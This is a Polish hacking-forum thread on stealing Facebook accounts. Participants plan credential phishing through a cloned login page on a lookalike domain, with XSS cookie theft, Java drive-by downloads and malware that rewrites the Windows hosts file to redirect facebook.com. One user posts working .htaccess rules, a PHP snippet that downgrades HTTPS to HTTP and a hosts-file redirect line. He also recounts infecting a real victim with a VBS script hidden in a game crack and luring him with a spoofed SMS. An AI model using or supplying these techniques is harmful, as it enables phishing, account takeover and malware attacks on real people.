Facebook wykradanie sesji.

[DanoPlurana]

Siemka, przyznam ze pytanie pewnie troche głupie, mozliwe ze juz cos o tym było na forum, ale nie znalazlem. Mianowicie, ktos sie orientuje jak wyglada proces autoryzacji sesji jezeli chodzi o fejsbuka? mam na mysli czy jest mozliwosc postawienia stronki ktora przy odwiedzeniu bedzie wymagala dokladnie tego pliku (cookiesa?) ktorego potrzebuje fb do zalogowania (jezeli ktos juz wczesniej podal haslo i jego sesja jest aktywna) i zapisywałby go na FTP. Kiedys taka akcja była mozliwa z pewnym dodatkiem do firefoxa, ktory sniffował sieć lokalna i wyłapywał sesje Gmaila fejsa itp, nie wiem czy to jeszcze działa

Mysle ze wyrazilem sie jasno o co chodzi jakby ktos był chętny naprowadzic na jakis trop z góry dzieki

Pzdr

 

[DanoPlurana]

Albo inaczej, zrobic stronkę z Java Drive-by, który po zaakceptowaniu sciagalby wczesniej napisany program i go uruchamial, a ten program kopiowalby odpowiednie pliki i wysylal mailem, lub ladowal na FTP Cos takiego nie powinno byc wykrywalne w sumie, albo jeszcze inaczej zostać przy Java Drive-by i napisac program który modyfikowałby plik Hosts, tak aby przy odpaleniu facebooka przekierowywalo na nasza stronke phisingową haha chyba za duzo o tym myśle... Ktos cos podobnego zrobil? Ma to jakies szanse na powodzenie?

Pzdr

 

[zus1]

z tego co pamietam to fb korzysta z httponly, więc wykradanie trwającej sesji jest troche ciężkie (ale do zrobienia), lepszym sposobem będzie postawienie fake fb np. z domeną facelook.pl - z małym clonem strony fb (za pomocą np. SET 30sek roboty) z małym XSS, który będzie wykradał ciastka bez flagi httponly.

Podsumowanie: ktoś logując się na facelook.pl wpisuje swój login, hasło (Ty je zapisujesz na ftp), w tle działa sobie XSS wykradając reszte ciastek - i w ten zacny sposób masz login i hasło do fb + małe gifty.

 

[DanoPlurana]

@Zus1 dzieki za odpowiedz!! oczywiscie mam strone fb ze skryptem zapisującym hasla, problem w tym ze nie wszyscy się na to łapią, chcialbym ukrasc ciasteczko aktywnej sesji i sie nim zalogowac, ale przy https, chyba faktycznie odpada. Co do Twojego sposobu, co moge zrobic z giftami o ktorych mówisz? jezeli ktos mi sie zaloguje na fake stronce, po co mi jeszcze do tego jego ciacho? mam juz wszystko czego chce

Pzdr )

 

[Hunter]

z tego co pamietam to fb korzysta z httponly, więc wykradanie trwającej sesji jest troche ciężkie (ale do zrobienia), lepszym sposobem będzie postawienie fake fb np. z domeną facelook.pl - z małym clonem strony fb (za pomocą np. SET 30sek roboty) z małym XSS, który będzie wykradał ciastka bez flagi httponly.

Podsumowanie: ktoś logując się na facelook.pl wpisuje swój login, hasło (Ty je zapisujesz na ftp), w tle działa sobie XSS wykradając reszte ciastek - i w ten zacny sposób masz login i hasło do fb + małe gifty.

Jak postawisz klona set'em to mimo trwajacej sesji ofiara bedzie musiala sie zalogowac a wtedy set wyprintuje login/haslo wiec po co zabawa set + xss ?.

Jedynym problemem bedzie sytuacja gdzie np. ofaira w chrome ma zapamietana strone jako https://facebook* wtedy nawet jak recznie wpisze http://facebook to przekieruje go na ssl dlatego na fake www musimy dopisac funkcje weryfikujaca / zmieniajaca protkol z https / http.

Jesli ofiara jest w sieci lokalnej i uzyjemy dnspoofingu to nalezy tez napisac .htaccess ktory bedzie przekierowywal z dowolnego aktywnego url'a na index.php naszego apache'a (aby uniknac NOT FOUND).

Mozesz tez zdalnie dokonac dnsspoofingu piszac aplikacje dopisujaca do \windows\system32\drivers\etc\hosts

ip_fake_fb facebook.com

 

[DanoPlurana]

Jak postawisz klona set'em to mimo trwajacej sesji ofiara bedzie musiala sie zalogowac a wtedy set wyprintuje login/haslo wiec po co zabawa set + xss ?.

No wlasnie dokladnie to samo mialem na mysli

Jedynym problemem bedzie sytuacja gdzie np. ofaira w chrome ma zapamietana strone jako https://facebook* wtedy nawet jak recznie wpisze http://facebook to przekieruje go na ssl dlatego na fake www musimy dopisac funkcje weryfikujaca / zmieniajaca protkol z https / http.

Jesli ofiara jest w sieci lokalnej i uzyjemy dnspoofingu to nalezy tez napisac .htaccess ktory bedzie przekierowywal z dowolnego aktywnego url'a na index.php naszego apache'a (aby uniknac NOT FOUND).

Mozesz tez zdalnie dokonac dnsspoofingu piszac aplikacje dopisujaca do \windows\system32\drivers\etc\hosts

ip_fake_fb facebook.com

Opcja z LANem nie wchodzi w grę, chcialbym zeby to dzialalo dla wszystkich, co do aplikacji modyfikującej plik hosts, zastanawia mnie tylko czy hosts domyslnie nie jest 'read only' i czy aplikacja bedzie miala do niego dostęp, czy nie wyskoczy jakis UAC albo coś. Z 2. strony nawet jezeli hosts jest read only, to mysle ze nie bedzie problemem gdybym napisal program ktory usuwałby ostniejące hosts i podmienial na moje, z dodaną linijką spoofującą strone facebooka. W koncu u kazdego hosts wygląda tak samo jezeli nic w nim nie grzebalismy )

Dzieki za odpowiedzi na poziomie Panowie

Pzdr

 

[Hunter]

O ile mnie pamiec nie myli plik hosts nie posiada domyslnie "read only" (z wlaczonym UAC udalo sie podmienic zwartosc hosts (; ).

Ps.

1) przekierowanie z dowolnego url'a na index.php .htaccess:

RewriteEngine on
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . index.php [L]

2) bounce ssl index.php:

<? if($_SERVER['SERVER_PORT'] == 443) {
header("HTTPS/1.1 301 Moved Permanently");
header("Location: http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
exit();} ?>

Ps.2 odnosnie fb sesji - http://goo.gl/4NVDS

 

[zus1]

Co do Twojego sposobu, co moge zrobic z giftami o ktorych mówisz? jezeli ktos mi sie zaloguje na fake stronce, po co mi jeszcze do tego jego ciacho? mam juz wszystko czego chce

Pzdr )

Zasada stawiasz fake fb user się loguje i dostajesz login i hasło + z XSS wszystkie ciasteczka sesyjne bez flagi HTTPONLY;] -fora itp.

Druga stroną medalu Hunter ma racje dupa jest z https - można podstawić swój jakiś lewy cert, i liczyć na mało inteligentnych userów.
Jeśli zrobisz zmianki w host, to co dalej z userem? Przekierujesz go plikiem hosts gdzieś na jakiegoś serwera i tak będzie potem musiał się zalogować na prawdziwego fb.

 

[Hunter]

Zasada stawiasz fake fb user się loguje i dostajesz login i hasło + z XSS wszystkie ciasteczka sesyjne bez flagi HTTPONLY;] -fora itp.

Druga stroną medalu Hunter ma racje dupa jest z https - można podstawić swój jakiś lewy cert, i liczyć na mało inteligentnych userów.
Jeśli zrobisz zmianki w host, to co dalej z userem? Przekierujesz go plikiem hosts gdzieś na jakiegoś serwera i tak będzie potem musiał się zalogować na prawdziwego fb.

Jezeli chodzi o mnie... ostatnie tego typu zlecenia wykonalem vbsem ktory uruchomil sie wraz z crackiem (crack do gry oczywiscie dzialal normalnie jeszcze otrzymalem jako nie "ja" ;f (dluga historia, teoretycznie ofiara rozmawiala ze swoja girl) podziekowania. Tak czy owak skryptem zmodyfikowalem zawartosc hosts ( UAC byl wlaczony ), i dopisal kopie ktora uruchomila sie przy next autostarcie jako current user i wtedy czyscilo plik hosts...

Prostacki sposob aczkolwiek to byla pomoc "4 friend" no i najwazniejsze ze zakonczyla sie sukcesem.

Przekierowalem sesje z fake fb na oryginalny page niestety jak sie okazalo fb jest zabezpieczone przed tego typu atakiem (przynajmniej na tyle ile ja go przygotowalem) poniewaz otrzymalem komunikat ze nie mozna sie zalgoowac poniewaz cookiesy nie pochodza z tego serwera ;/

Ps. bym zapomnial.... oczywiscie na poczatku byl epic fail poniewaz "targeta" pochlonela bez reszty "zcrakowana" gra -.-, na szczescie zdobylem wczesniej gsm jego dziewczyny dlatego tez "target" otrzymal spoof smsa zeby szybko sprawdzil na fb i napisal czy mu sie podoba (Sprawdzil po prawie 2 h).

Ps.2 podstawienie wlasnego cert ssl spowoduje wyswietlenie "powalonego" komunikatu o nieautentycznosci etc... moj sposob bounce ssl wymusza logowanie http - no przeciez kto zwraca uwage na to ze wpisuje https://adres a finlanie ma http://adres ? ;o